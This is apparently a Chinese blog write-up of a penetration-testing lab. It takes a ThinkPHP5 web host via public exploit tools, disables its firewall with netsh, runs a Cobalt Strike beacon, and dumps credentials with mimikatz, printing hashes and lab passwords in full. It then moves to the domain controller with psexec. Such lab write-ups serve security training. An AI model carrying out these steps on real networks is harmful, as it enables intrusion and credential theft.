环境搭建

虚拟机密码

win7

sun\heart 123.com

sun\Administrator dc123.com(因为过期了,改成Admin12345)

2008

sun\admin 2020.com(改成2022.com)

Win7双网卡模拟内外网

仅主机模式网卡:192.168.138.0

NAT模式网卡:192.168.135.0

配置好后需要进入win7主机将phpstudy服务开起来

image-20241121125028618

emmm试了一下又是不能ping通的,但是网页能正常访问

考点思路

一、环境搭建

  • 1.环境搭建测试

  • 2.信息收集

二、漏洞利用

  • 3.漏洞搜索与利用

  • 4.漏洞利用Getshell

  • 5.系统信息收集

  • 6.主机密码收集

三、内网搜集

  • 7.内网–继续信息收集

  • 8.内网攻击姿势–MS14-058

  • 9.内网攻击姿势–MS17-010

四、横向移动

  • 10.psexec远控

  • 11.内网其它主机端口

  • 12.netsh增删防火墙规则

五、构建通道

  • 13.内网其它主机端口-代理转发

六、持久控制

  • 14.域渗透-域成员信息收集

  • 15.域渗透-基础服务弱口令探测及深度利用之powershell

  • 16.域渗透-横向移动[wmi利用]

  • 17.域渗透-域控实现与利用

七、痕迹清理

  • 18、日志清理

外网打点

先arp-scan -l看一下存活主机

image-20241121125732100

拿到web服务器地址:192.168.135.150

做一下端口扫描

nmap -sS -v 192.168.135.150

扫出来两个端口信息

PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql

然后fscan扫出来一个135端口开放,但是我的fscan漏洞探测不了不知道为什么,我们手动去看一下

image-20241121130427924

访问一下80端口的服务可以看到是一个thinkphp5的服务

image-20241121125627193

用工具:https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3或者https://github.com/bewhale/thinkphp_gui_tools看看能不能一把梭,不过最好使用java8来运行,这里可以去Oracle下载一个java8的jdk

image-20241121132256316

解压

tar -xzvf jdk-8u401-linux-x64.tar.gz

有点男泵,这台kali一直说我超内存,我换了一台kali就可以了

image-20241121161223838

可以看到扫出了四个洞了,这下可以一把梭了

选择对应poc执行一下

image-20241121161320128

发现可以成功,那这时候就直接getshell蚁剑连一下

image-20241121162241375

image-20241121162256002

成功连接

不过为了方便上传cs马这里还是上传一个冰蝎马来连接

image-20241121163421297

然后关一下防火墙先

netsh advfirewall set allprofiles state off

image-20241121163742545

然后上传一个cs的木马

image-20241121164338443

然后运行

image-20241121164413507

可以看到主机成功上线

内网渗透

常规net view看一下主机

image-20241121164636888

可以看到域控的地址为:192.168.138.138

然后mimikatz进行logonpasswords拿一下密码信息

image-20241121164833388

Authentication Id : 0 ; 151193 (00000000:00024e99)
Session           : Interactive from 1
User Name         : Administrator
Domain            : SUN
Logon Server      : DC
Logon Time        : 2024/11/21 12:44:44
SID               : S-1-5-21-3388020223-1982701712-4030140183-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : SUN
	 * LM       : ac804745ee68ebea48116059303a4365
	 * NTLM     : ccef208c6485269c20db2cad21734fe7
	 * SHA1     : 58d1a25c09f4ee98209941b2b333fbe477d472a9
	tspkg :	
	 * Username : Administrator
	 * Domain   : SUN
	 * Password : Admin12345
	wdigest :	
	 * Username : Administrator
	 * Domain   : SUN
	 * Password : Admin12345
	kerberos :	
	 * Username : Administrator
	 * Domain   : SUN.COM
	 * Password : Admin12345
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/11/21 12:44:36
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN7$
Domain            : SUN
Logon Server      : (null)
Logon Time        : 2024/11/21 12:44:36
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WIN7$
	 * Domain   : SUN
	 * NTLM     : 19a799ef7003f143f69e5eb204369f74
	 * SHA1     : e7a55023d5275327b14b77af9fb37f9929ce114d
	tspkg :	
	wdigest :	
	 * Username : WIN7$
	 * Domain   : SUN
	 * Password : db cc 80 3b b4 2a 72 b6 e9 7c 58 55 7d d4 39 9f c4 54 c6 09 ce f4 bf e6 dc 51 d9 be e0 fd e6 85 ff 87 b2 fd 38 ea ff 04 0c 9f cf 6f e6 26 01 9d 0c 48 06 6c 2c 4a 3e b3 26 77 b3 44 65 c6 04 37 bb 5c 5c cb 86 3d b3 4c 94 3a 96 92 e1 65 2a 94 7e 4b 43 ff 8f 0c b3 2e 5d 50 23 29 f8 55 70 c4 e3 41 a9 66 94 d2 38 40 af 9f 3c f6 b0 31 10 8e 21 22 0e 76 25 52 76 64 a7 95 3e b2 85 58 5f fa 18 2e bd 4f e3 99 6e 1d 49 80 00 8a 30 f2 aa 39 66 e1 36 9c 79 ad 7c cd fb ec c4 b8 2a 33 21 1c 9a 82 e3 8a e4 5e 12 f2 60 94 f0 ed fb ad 83 b5 9d 35 dd cd ac bd 23 3c 2d 6c a9 3a aa 93 60 c9 d6 1f 5a b9 95 5d 41 fb 70 02 ea 2c d1 8d b3 6f 82 70 0a 34 bf f3 10 42 25 56 e3 a9 b6 71 f5 03 f8 6f 84 6e 66 fa 9f 7b 23 43 ad f9 eb 15 43 59 
	kerberos :	
	 * Username : win7$
	 * Domain   : SUN.COM
	 * Password : db cc 80 3b b4 2a 72 b6 e9 7c 58 55 7d d4 39 9f c4 54 c6 09 ce f4 bf e6 dc 51 d9 be e0 fd e6 85 ff 87 b2 fd 38 ea ff 04 0c 9f cf 6f e6 26 01 9d 0c 48 06 6c 2c 4a 3e b3 26 77 b3 44 65 c6 04 37 bb 5c 5c cb 86 3d b3 4c 94 3a 96 92 e1 65 2a 94 7e 4b 43 ff 8f 0c b3 2e 5d 50 23 29 f8 55 70 c4 e3 41 a9 66 94 d2 38 40 af 9f 3c f6 b0 31 10 8e 21 22 0e 76 25 52 76 64 a7 95 3e b2 85 58 5f fa 18 2e bd 4f e3 99 6e 1d 49 80 00 8a 30 f2 aa 39 66 e1 36 9c 79 ad 7c cd fb ec c4 b8 2a 33 21 1c 9a 82 e3 8a e4 5e 12 f2 60 94 f0 ed fb ad 83 b5 9d 35 dd cd ac bd 23 3c 2d 6c a9 3a aa 93 60 c9 d6 1f 5a b9 95 5d 41 fb 70 02 ea 2c d1 8d b3 6f 82 70 0a 34 bf f3 10 42 25 56 e3 a9 b6 71 f5 03 f8 6f 84 6e 66 fa 9f 7b 23 43 ad f9 eb 15 43 59 
	ssp :	
	credman :	

Authentication Id : 0 ; 46807 (00000000:0000b6d7)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/11/21 12:44:36
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WIN7$
	 * Domain   : SUN
	 * NTLM     : 19a799ef7003f143f69e5eb204369f74
	 * SHA1     : e7a55023d5275327b14b77af9fb37f9929ce114d
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN7$
Domain            : SUN
Logon Server      : (null)
Logon Time        : 2024/11/21 12:44:36
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN7$
	 * Domain   : SUN
	 * Password : db cc 80 3b b4 2a 72 b6 e9 7c 58 55 7d d4 39 9f c4 54 c6 09 ce f4 bf e6 dc 51 d9 be e0 fd e6 85 ff 87 b2 fd 38 ea ff 04 0c 9f cf 6f e6 26 01 9d 0c 48 06 6c 2c 4a 3e b3 26 77 b3 44 65 c6 04 37 bb 5c 5c cb 86 3d b3 4c 94 3a 96 92 e1 65 2a 94 7e 4b 43 ff 8f 0c b3 2e 5d 50 23 29 f8 55 70 c4 e3 41 a9 66 94 d2 38 40 af 9f 3c f6 b0 31 10 8e 21 22 0e 76 25 52 76 64 a7 95 3e b2 85 58 5f fa 18 2e bd 4f e3 99 6e 1d 49 80 00 8a 30 f2 aa 39 66 e1 36 9c 79 ad 7c cd fb ec c4 b8 2a 33 21 1c 9a 82 e3 8a e4 5e 12 f2 60 94 f0 ed fb ad 83 b5 9d 35 dd cd ac bd 23 3c 2d 6c a9 3a aa 93 60 c9 d6 1f 5a b9 95 5d 41 fb 70 02 ea 2c d1 8d b3 6f 82 70 0a 34 bf f3 10 42 25 56 e3 a9 b6 71 f5 03 f8 6f 84 6e 66 fa 9f 7b 23 43 ad f9 eb 15 43 59 
	kerberos :	
	 * Username : win7$
	 * Domain   : SUN.COM
	 * Password : db cc 80 3b b4 2a 72 b6 e9 7c 58 55 7d d4 39 9f c4 54 c6 09 ce f4 bf e6 dc 51 d9 be e0 fd e6 85 ff 87 b2 fd 38 ea ff 04 0c 9f cf 6f e6 26 01 9d 0c 48 06 6c 2c 4a 3e b3 26 77 b3 44 65 c6 04 37 bb 5c 5c cb 86 3d b3 4c 94 3a 96 92 e1 65 2a 94 7e 4b 43 ff 8f 0c b3 2e 5d 50 23 29 f8 55 70 c4 e3 41 a9 66 94 d2 38 40 af 9f 3c f6 b0 31 10 8e 21 22 0e 76 25 52 76 64 a7 95 3e b2 85 58 5f fa 18 2e bd 4f e3 99 6e 1d 49 80 00 8a 30 f2 aa 39 66 e1 36 9c 79 ad 7c cd fb ec c4 b8 2a 33 21 1c 9a 82 e3 8a e4 5e 12 f2 60 94 f0 ed fb ad 83 b5 9d 35 dd cd ac bd 23 3c 2d 6c a9 3a aa 93 60 c9 d6 1f 5a b9 95 5d 41 fb 70 02 ea 2c d1 8d b3 6f 82 70 0a 34 bf f3 10 42 25 56 e3 a9 b6 71 f5 03 f8 6f 84 6e 66 fa 9f 7b 23 43 ad f9 eb 15 43 59 
	ssp :	
	credman :

管理员密码相关的信息我们也已经找到了

用户哈希也拿一下

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
heart:1000:aad3b435b51404eeaad3b435b51404ee:a34efdd63a23abea4413ba73cafa5a30:::

打域控

接下来就是要拿下域控了

既然都拿到hash了那就直接psexec横向移动一把梭了

建立一个smb监听器

image-20241121171441969

然后直接jump psexec

image-20241121171456605

成功上线

image-20241121171531530

image-20241121171543198

psexec能一把梭主要还是DC主机开了$ADMIN共享管道

image-20241121172048305

这台靶机比前面的简单挺多的

其实应该win7靶机用普通用户登录才对,这样我们才需要提权

查找提权漏洞的话我们可以用systeminfo保存下系统信息,然后用wesng工具来搜索

python wes.py sysinfo.txt --impact "Elevation of Privilege"
#--impact指定漏洞类型为提权漏洞

image-20241121183215773

然后就可以找到各种漏洞信息了

exp漏洞库:https://www.exploit-db.com/